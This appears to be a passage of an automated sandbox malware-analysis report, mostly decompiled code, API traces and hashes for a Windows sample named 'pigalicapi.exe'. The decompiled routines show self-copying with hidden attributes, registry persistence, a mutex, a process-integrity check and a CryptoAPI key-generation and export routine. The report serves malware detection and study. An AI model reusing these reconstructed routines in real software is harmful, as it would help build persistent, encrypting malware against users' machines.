                                                                                                                                                                                                                                                                          					Sleep(_v12108); // executed
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}





















































                                                                                                                                                                                                                                                                          0x04003b08
                                                                                                                                                                                                                                                                          0x04003b12
                                                                                                                                                                                                                                                                          0x04003b19
                                                                                                                                                                                                                                                                          0x04003b2d
                                                                                                                                                                                                                                                                          0x04003b38
                                                                                                                                                                                                                                                                          0x04003b40
                                                                                                                                                                                                                                                                          0x04003b4f
                                                                                                                                                                                                                                                                          0x04003b54
                                                                                                                                                                                                                                                                          0x04003b5c
                                                                                                                                                                                                                                                                          0x0400400a
                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                          0x0400400c
                                                                                                                                                                                                                                                                          0x04003b70
                                                                                                                                                                                                                                                                          0x04003b7f
                                                                                                                                                                                                                                                                          0x04003b8c
                                                                                                                                                                                                                                                                          0x04003b9a
                                                                                                                                                                                                                                                                          0x04003ba2
                                                                                                                                                                                                                                                                          0x04003bb4
                                                                                                                                                                                                                                                                          0x04003bca
                                                                                                                                                                                                                                                                          0x04003bd2
                                                                                                                                                                                                                                                                          0x04003bd7
                                                                                                                                                                                                                                                                          0x04003be1
                                                                                                                                                                                                                                                                          0x04003be6
                                                                                                                                                                                                                                                                          0x04003beb
                                                                                                                                                                                                                                                                          0x04003bfa
                                                                                                                                                                                                                                                                          0x04003c02
                                                                                                                                                                                                                                                                          0x04003c06
                                                                                                                                                                                                                                                                          0x04003c2a
                                                                                                                                                                                                                                                                          0x04003c34
                                                                                                                                                                                                                                                                          0x04003c3c
                                                                                                                                                                                                                                                                          0x04003c41
                                                                                                                                                                                                                                                                          0x04003c48
                                                                                                                                                                                                                                                                          0x04003c4d
                                                                                                                                                                                                                                                                          0x04003c53
                                                                                                                                                                                                                                                                          0x04003c64
                                                                                                                                                                                                                                                                          0x04003c6c
                                                                                                                                                                                                                                                                          0x04003c71
                                                                                                                                                                                                                                                                          0x04003c74
                                                                                                                                                                                                                                                                          0x04003c79
                                                                                                                                                                                                                                                                          0x04003c7f
                                                                                                                                                                                                                                                                          0x04003c80
                                                                                                                                                                                                                                                                          0x04003c85
                                                                                                                                                                                                                                                                          0x04003c8c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                          0x04003c92
                                                                                                                                                                                                                                                                          0x04003c98
                                                                                                                                                                                                                                                                          0x04003c9e
                                                                                                                                                                                                                                                                          0x04003cb1
                                                                                                                                                                                                                                                                          0x04003cb3
                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                          0x04003cbb
                                                                                                                                                                                                                                                                          0x04003cc9
                                                                                                                                                                                                                                                                          0x04003ccb
                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                          0x04003cd4
                                                                                                                                                                                                                                                                          0x04003ce3
                                                                                                                                                                                                                                                                          0x04003ce5
                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                          0x04003cee
                                                                                                                                                                                                                                                                          0x04003cfd
                                                                                                                                                                                                                                                                          0x04003cff
                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                          0x04003d07
                                                                                                                                                                                                                                                                          0x04003d15
                                                                                                                                                                                                                                                                          0x04003d17
                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                          0x04003d20
                                                                                                                                                                                                                                                                          0x04003d26
                                                                                                                                                                                                                                                                          0x04003d2f
                                                                                                                                                                                                                                                                          0x04003d31
                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                          0x04003d3a
                                                                                                                                                                                                                                                                          0x04003d40
                                                                                                                                                                                                                                                                          0x04003d58
                                                                                                                                                                                                                                                                          0x04003d60
                                                                                                                                                                                                                                                                          0x04003d80
                                                                                                                                                                                                                                                                          0x04003d88
                                                                                                                                                                                                                                                                          0x04003da7
                                                                                                                                                                                                                                                                          0x04003daf
                                                                                                                                                                                                                                                                          0x04003db5
                                                                                                                                                                                                                                                                          0x04003dbf
                                                                                                                                                                                                                                                                          0x04003dc9
                                                                                                                                                                                                                                                                          0x04003df3
                                                                                                                                                                                                                                                                          0x04003df8
                                                                                                                                                                                                                                                                          0x04003dfd
                                                                                                                                                                                                                                                                          0x04003e0d
                                                                                                                                                                                                                                                                          0x04003e2b
                                                                                                                                                                                                                                                                          0x04003e30
                                                                                                                                                                                                                                                                          0x04003e39
                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                          0x04003e3f
                                                                                                                                                                                                                                                                          0x04003e49
                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                          0x04003e53
                                                                                                                                                                                                                                                                          0x04003e5a
                                                                                                                                                                                                                                                                          0x04003e64
                                                                                                                                                                                                                                                                          0x04003e75
                                                                                                                                                                                                                                                                          0x04003e7d
                                                                                                                                                                                                                                                                          0x04003e9e
                                                                                                                                                                                                                                                                          0x04003ea3
                                                                                                                                                                                                                                                                          0x04003eab
                                                                                                                                                                                                                                                                          0x04003f8a
                                                                                                                                                                                                                                                                          0x04003eb1
                                                                                                                                                                                                                                                                          0x04003ecc
                                                                                                                                                                                                                                                                          0x04003ed1
                                                                                                                                                                                                                                                                          0x04003ed9
                                                                                                                                                                                                                                                                          0x04003f81
                                                                                                                                                                                                                                                                          0x04003edf
                                                                                                                                                                                                                                                                          0x04003efa
                                                                                                                                                                                                                                                                          0x04003eff
                                                                                                                                                                                                                                                                          0x04003f07
                                                                                                                                                                                                                                                                          0x04003f78
                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                          0x04003f22
                                                                                                                                                                                                                                                                          0x04003f43
                                                                                                                                                                                                                                                                          0x04003f48
                                                                                                                                                                                                                                                                          0x04003f50
                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                          0x04003f60
                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                          0x04003f76
                                                                                                                                                                                                                                                                          0x04003f7f
                                                                                                                                                                                                                                                                          0x04003f88
                                                                                                                                                                                                                                                                          0x04003f9a
                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                          0x04003fd7
                                                                                                                                                                                                                                                                          0x04003fd9
                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                          0x04003fa5
                                                                                                                                                                                                                                                                          0x04003fac
                                                                                                                                                                                                                                                                          0x04003fc4
                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                          0x04003fce
                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                          0x04003ff4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04003ff4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04003B40
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0400400C
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(Sscculmqcxgnq,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(Sscculmqcxgnq), ref: 04005AAE
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Sscculmqcxgnq), ref: 04005AC8
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                            • Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04003C85
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04003FF4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\pigalicapi.exe$Kobucgekyxca$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1389186475-3751886320
                                                                                                                                                                                                                                                                          • Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                          • Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 906 4008800-4008811 907 4008817-400881b 906->907 908 400895c-4008962 906->908 907->908 909 4008821-4008843 CryptAcquireContextA 907->909 910 4008845-4008855 GetLastError 909->910 911 400887a-400887e 909->911 912 4008860-4008874 CryptAcquireContextA 910->912 913 4008857-400885e 910->913 911->908 914 4008884-40088b7 CryptGenKey 911->914 912->911 913->911 913->912 915 4008950-4008956 CryptReleaseContext 914->915 916 40088bd-40088d7 CryptExportKey 914->916 915->908 917 4008946-400894a CryptDestroyKey 916->917 918 40088d9-40088dd 916->918 917->915 919 400893f 918->919 920 40088df-40088e3 918->920 919->917 920->919 921 40088e5-40088e9 920->921 921->919 922 40088eb-40088ef 921->922 922->919 923 40088f1-4008914 CryptImportKey 922->923 924 4008916-4008937 CryptExportKey CryptDestroyKey 923->924 925 400893d 923->925 924->925 925->917
                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                          			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				long* _v32;
                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                          				char* _t71;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t41 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t42 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t71 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v28 = 0x80;
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                          						_t43 = _v24;
                                                                                                                                                                                                                                                                          						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20); // executed
                                                                                                                                                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                                                                                                                                                          							_t46 = _a4;
                                                                                                                                                                                                                                                                          							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                                                          								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v32 = 0;
                                                                                                                                                                                                                                                                          									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                          									if(_t49 != 0) {
                                                                                                                                                                                                                                                                          										_t51 = _v20;
                                                                                                                                                                                                                                                                          										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                          										_v8 = _t51;
                                                                                                                                                                                                                                                                          										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04008806
                                                                                                                                                                                                                                                                          0x04008811
                                                                                                                                                                                                                                                                          0x0400895c
                                                                                                                                                                                                                                                                          0x04008962
                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                          0x04008831
                                                                                                                                                                                                                                                                          0x0400883b
                                                                                                                                                                                                                                                                          0x04008843
                                                                                                                                                                                                                                                                          0x0400884b
                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                          0x04008869
                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                          0x0400887e
                                                                                                                                                                                                                                                                          0x04008884
                                                                                                                                                                                                                                                                          0x0400888b
                                                                                                                                                                                                                                                                          0x0400889b
                                                                                                                                                                                                                                                                          0x040088a2
                                                                                                                                                                                                                                                                          0x040088af
                                                                                                                                                                                                                                                                          0x040088b7
                                                                                                                                                                                                                                                                          0x040088c1
                                                                                                                                                                                                                                                                          0x040088cf
                                                                                                                                                                                                                                                                          0x040088d7
                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                          0x0400893f
                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                          0x0400890c
                                                                                                                                                                                                                                                                          0x04008914
                                                                                                                                                                                                                                                                          0x04008926
                                                                                                                                                                                                                                                                          0x0400892a
                                                                                                                                                                                                                                                                          0x04008930
                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                          0x0400893d
                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400887e

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                          • Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                                                                                          			E04001CA0(CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				char _v5;
